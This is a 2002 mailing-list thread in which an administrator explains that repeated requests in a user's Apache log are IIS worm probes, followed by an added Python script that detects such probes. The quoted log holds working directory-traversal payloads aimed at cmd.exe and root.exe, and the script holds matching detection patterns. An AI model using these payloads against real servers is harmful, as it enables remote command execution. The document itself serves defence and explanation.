RE: Cracked cracker?
It's actually a sign that there's an IIS worm on that machine. It's not
a person, it's a virus, attempting to propagate to your machine. Since
you run Apache, you're safe from the virus, but not from the attempts.
*sigh*
The most common solution I've heard is to set up an ipchains firewall
rule that prevents that machine from hitting their Apache installations.
dave
{
David W. Harks
CougarNet Network Ops Admin
harksdw@curf.edu
(708) 209-3577
}
-----Original Message-----
From: Michael Olds [mailto:MikeOlds@pacbell.net]
Sent: Thursday, December 12, 2002 9:56 AM
To: Debian-User
Subject: Cracked cracker?
This is a small sample from my access log. Can someone explain to me why
this person would repeatedly attempt access to my computer using the
same IP and the same requests over and over? This isn't to the point of
being a DOS attack; can't they see I don't have any of these things that
they think will enable them to crack my machine? Or is there something
else going on here?
63.205.213.16 - - [11/Dec/2002:13:16:07 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:07 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:07 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:08 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
63.205.213.16 - - [11/Dec/2002:13:16:09 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
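Added example, not part of the original thread: a small Python classifier that picks out this kind of IIS-worm probe in an Apache combined-format access log and lists the source hosts worth a firewall rule. The function names, the threshold of 3 and the sample lines are assumptions made for the example; the request paths are copied from the log above and the addresses are documentation (TEST-NET) ranges.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache combined log: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
WINDOWS_BINARIES = ("cmd.exe", "root.exe")  # targets requested in the thread's log

def decode_fully(path, max_rounds=4):
    """Percent-decode until stable so %255c, %%35c and %25%35%63 all become a backslash."""
    for _ in range(max_rounds):
        path, previous = unquote(path, encoding="latin-1"), path
        if path == previous:
            break
    return path

def classify(line):
    """Return (host, status, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    host, target, status = m.groups()
    path = decode_fully(target.split("?", 1)[0])
    reasons = []
    if path.lower().endswith(WINDOWS_BINARIES):
        reasons.append("windows-binary")
    if "../" in path or "..\\" in path:
        reasons.append("traversal")
    if "\xc0" in path or "\xc1" in path:  # lead bytes of overlong UTF-8 (e.g. %c0%af)
        reasons.append("overlong-utf8")
    return host, int(status), reasons

def probe_sources(lines, threshold=3):
    """Hosts with >= threshold flagged requests; 'served' is True if any got a 2xx."""
    hits = defaultdict(lambda: {"probes": 0, "served": False})
    for host, status, reasons in filter(None, map(classify, lines)):
        if reasons:
            hits[host]["probes"] += 1
            hits[host]["served"] |= 200 <= status < 300
    return {h: v for h, v in hits.items() if v["probes"] >= threshold}

# Constructed sample: targets copied from the thread's log, hosts from TEST-NET ranges.
FMT = '{} - - [11/Dec/2002:13:16:07 -0800] "GET {} HTTP/1.0" {} 270 "-" "-"'
SAMPLE = [FMT.format(*row) for row in (
    ("192.0.2.10", "/scripts/root.exe?/c+dir", 404),
    ("192.0.2.10", "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir", 404),
    ("192.0.2.10", "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir", 404),
    ("198.51.100.7", "/index.html", 200),
)]
```

probe_sources(SAMPLE) reports only 192.0.2.10, with three probes and served set to False, which matches the situation in the thread: every probe was answered with a 4xx, so the host is a candidate for blocking rather than a sign of compromise.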